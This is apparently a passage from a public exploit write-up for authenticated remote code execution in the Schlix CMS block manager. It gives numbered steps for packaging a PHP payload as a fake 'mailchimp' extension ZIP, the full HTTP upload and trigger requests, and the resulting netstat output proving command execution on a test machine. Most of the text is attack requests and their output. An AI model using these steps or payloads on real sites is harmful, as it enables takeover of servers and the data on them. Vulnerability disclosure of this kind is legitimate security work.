$command"; ?> ##################################### 7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'. 8- Install a package to created category and enter the installed 'mailchimp' extension. 9- Click the 'About' tab and our php code will be executed. ==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <== $command"; ?> ==> HTTP Request (ZIP Extension Installation) <== POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Schlix-Ajax: 1 Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130 Content-Length: 51585 Origin: http(s)://(ORIGIN) Connection: close Referer: http(s)://(REFERER)/admin/app/core.blockmanager Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="_csrftoken" a3b9a0da8d6be08513f60d1744e2642df0702ff7 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip" Content-Type: application/x-zip-compressed ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="MAX_FILE_SIZE" 2097152 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="zipfileupload__total_file_size" 0 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="zipfileupload__max_file_count" 20 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="password" # Your ACC Password. -----------------------------29322337091578227221515354130-- ==> HTTP Request (RCE - About Tab) <== GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http(s)://(HOST)/ Connection: close Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 Upgrade-Insecure-Requests: 1 ==> HTTP Response (RCE - About Tab) <== HTTP/1.1 200 OK Date: Wed, 05 May 2021 21:49:24 GMT Server: Apache/2.4.46 (Win64) PHP/7.3.21 X-Powered-By: PHP/7.3.21 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 49575
Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:80 0.0.0.0:0 LISTENING TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:902 0.0.0.0:0 LISTENING TCP 0.0.0.0:912 0.0.0.0:0 LISTENING TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING TCP 0.0.0.0:3307 0.0.0.0:0 LISTENING TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING TCP 0.0.0.0:50296 0.0.0.0:0 LISTENING TCP 127.0.0.1:80 127.0.0.1:58843 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58853 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58854 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58859 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58860 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58865 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58868 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58883 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58893 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58894 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58899 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58902 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58908 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58918 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58919 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58924 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58886 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58887 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58888 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58891 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58905 CLOSE_WAIT TCP 127.0.0.1:8080 127.0.0.1:58907 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58911 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58913 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58915 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58916 TIME_WAIT TCP 127.0.0.1:58424 127.0.0.1:58425 ESTABLISHED TCP 127.0.0.1:58425 127.0.0.1:58424 ESTABLISHED TCP 127.0.0.1:58435 127.0.0.1:58436 ESTABLISHED TCP 127.0.0.1:58436 127.0.0.1:58435 ESTABLISHED TCP 127.0.0.1:58565 127.0.0.1:58566 ESTABLISHED TCP 127.0.0.1:58566 127.0.0.1:58565 ESTABLISHED TCP 127.0.0.1:58639 127.0.0.1:58640 ESTABLISHED TCP 127.0.0.1:58640 127.0.0.1:58639 ESTABLISHED TCP 169.254.22.167:139 0.0.0.0:0 LISTENING TCP 169.254.224.26:139 0.0.0.0:0 LISTENING TCP 192.168.1.8:139 0.0.0.0:0 LISTENING TCP 192.168.1.8:49500 95.101.14.77:443 ESTABLISHED TCP 192.168.1.8:57059 162.159.129.235:443 ESTABLISHED TCP 192.168.1.8:57902 162.159.138.234:443 ESTABLISHED TCP 192.168.1.8:58453 44.235.189.138:443 ESTABLISHED TCP 192.168.1.8:58626 162.159.138.232:443 ESTABLISHED TCP 192.168.1.8:58627 162.159.133.234:443 ESTABLISHED TCP 192.168.1.8:58699 162.159.135.232:443 ESTABLISHED TCP 192.168.1.8:58841 20.44.232.74:443 ESTABLISHED TCP 192.168.1.8:58942 162.159.138.232:443 ESTABLISHED TCP 192.168.1.8:58951 138.68.92.190:443 ESTABLISHED TCP 192.168.1.8:60549 51.103.5.159:443 ESTABLISHED TCP 192.168.1.8:60610 104.66.70.197:443 ESTABLISHED TCP 192.168.1.8:60611 104.66.70.197:443 ESTABLISHED TCP 192.168.1.8:60612 217.31.233.104:443 CLOSE_WAIT TCP [::]:80 [::]:0 LISTENING TCP [::]:135 [::]:0 LISTENING TCP [::]:445 [::]:0 LISTENING TCP [::]:3306 [::]:0 LISTENING TCP [::]:3307 [::]:0 LISTENING TCP [::]:7680 [::]:0 LISTENING TCP [::]:49664 [::]:0 LISTENING TCP [::]:49665 [::]:0 LISTENING TCP [::]:49666 [::]:0 LISTENING TCP [::]:49667 [::]:0 LISTENING TCP [::]:49668 [::]:0 LISTENING TCP [::]:50296 [::]:0 LISTENING TCP [::1]:3306 [::1]:58845 TIME_WAIT TCP [::1]:3306 [::1]:58856 TIME_WAIT TCP [::1]:3306 [::1]:58857 TIME_WAIT TCP [::1]:3306 [::1]:58858 TIME_WAIT TCP [::1]:3306 [::1]:58932 TIME_WAIT TCP [::1]:3306 [::1]:58935 TIME_WAIT TCP [::1]:3306 [::1]:58940 TIME_WAIT TCP [::1]:3306 [::1]:58950 TIME_WAIT TCP [::1]:3306 [::1]:58953 ESTABLISHED TCP [::1]:3306 [::1]:58954 ESTABLISHED TCP [::1]:49485 [::1]:49486 ESTABLISHED TCP [::1]:49486 [::1]:49485 ESTABLISHED TCP [::1]:49669 [::]:0 LISTENING TCP [::1]:58844 [::1]:3306 TIME_WAIT TCP [::1]:58845 [::1]:3306 TIME_WAIT TCP [::1]:58855 [::1]:3306 TIME_WAIT TCP [::1]:58856 [::1]:3306 TIME_WAIT TCP [::1]:58857 [::1]:3306 TIME_WAIT TCP [::1]:58858 [::1]:3306 TIME_WAIT TCP [::1]:58861 [::1]:3306 TIME_WAIT TCP [::1]:58862 [::1]:3306 TIME_WAIT TCP [::1]:58863 [::1]:3306 TIME_WAIT TCP [::1]:58864 [::1]:3306 TIME_WAIT TCP [::1]:58866 [::1]:3306 TIME_WAIT TCP [::1]:58867 [::1]:3306 TIME_WAIT TCP [::1]:58869 [::1]:3306 TIME_WAIT TCP [::1]:58870 [::1]:3306 TIME_WAIT TCP [::1]:58884 [::1]:3306 TIME_WAIT TCP [::1]:58885 [::1]:3306 TIME_WAIT TCP [::1]:58929 [::1]:3306 TIME_WAIT TCP [::1]:58930 [::1]:3306 TIME_WAIT TCP [::1]:58931 [::1]:3306 TIME_WAIT TCP [::1]:58932 [::1]:3306 TIME_WAIT TCP [::1]:58934 [::1]:3306 TIME_WAIT TCP [::1]:58935 [::1]:3306 TIME_WAIT TCP [::1]:58939 [::1]:3306 TIME_WAIT TCP [::1]:58940 [::1]:3306 TIME_WAIT TCP [::1]:58946 [::1]:3306 TIME_WAIT TCP [::1]:58947 [::1]:3306 TIME_WAIT TCP [::1]:58949 [::1]:3306 TIME_WAIT TCP [::1]:58950 [::1]:3306 TIME_WAIT TCP [::1]:58953 [::1]:3306 ESTABLISHED TCP [::1]:58954 [::1]:3306 ESTABLISHED UDP 0.0.0.0:5050 *:* UDP 0.0.0.0:5353 *:* UDP 0.0.0.0:5355 *:* UDP 0.0.0.0:53240 *:* UDP 0.0.0.0:53241 *:* UDP 127.0.0.1:1900 *:* UDP 127.0.0.1:62353 *:* UDP 127.0.0.1:63129 *:* UDP 192.168.1.8:137 *:* UDP 192.168.1.8:138 *:* UDP 192.168.1.8:1900 *:* UDP 192.168.1.8:2177 *:* UDP 192.168.1.8:63128 *:* UDP [::]:5353 *:* UDP [::]:5355 *:* UDP [::1]:1900 *:* UDP [::1]:63125 *:* UDP [fe80::e4d5:62f5:da3:2dae%21]:1900 *:* UDP [fe80::e4d5:62f5:da3:2dae%21]:2177 *:* UDP [fe80::e4d5:62f5:da3:2dae%21]:63124 *:*